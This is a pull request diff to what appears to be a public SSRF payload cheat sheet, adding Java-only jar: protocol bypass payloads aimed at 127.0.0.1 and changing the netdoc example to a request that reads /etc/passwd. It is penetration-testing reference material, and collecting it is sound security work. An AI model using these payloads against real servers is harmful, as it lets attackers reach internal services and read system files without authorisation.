### PR TITLE
Update ssrf payloads specific to java 

### DIFF
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -21,6 +21,7 @@
   * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
   * [Bypass filter_var() php function](#bypass-filter_var-php-function)
   * [Bypass against a weak parser](#bypass-against-a-weak-parser)
+  * [Bypassing using jar protocol (java only)](#bypassing-using-jar-protocol-java-only)
 * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
   * [file://](#file)
   * [http://](#http)
@@ -248,6 +249,8 @@ make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
 ```
 
 ### Bypassing using jar protocol (java only)
+
+Blind SSRF
 
 ```powershell
 jar:scheme://domain/path!/ 

--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -781,3 +781,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)
 - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
 - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
+- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)

--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom
 make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
 ```
 
+### Bypassing using jar protocol (java only)
+
+```powershell
+jar:scheme://domain/path!/ 
+jar:http://127.0.0.1!/
+jar:https://127.0.0.1!/
+jar:ftp://127.0.0.1!/
+```
+
 ## SSRF exploitation via URL Scheme
 
 ### File 
@@ -374,8 +383,8 @@ Content of evil.com/redirect.php:
 Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
 
 ```powershell
-ssrf.php?url=gopher://127.0.0.1:4242/DATA
-```
+ssrf.php?url=netdoc:///etc/passwd
+``` 
 
 ## SSRF exploiting WSGI
 


### PR DESCRIPTION
The netdoc section has gohper scheme which is wrong and i have corrected with the right payload and also added blind ssrf payloads using jar protocol which is only supported in java applications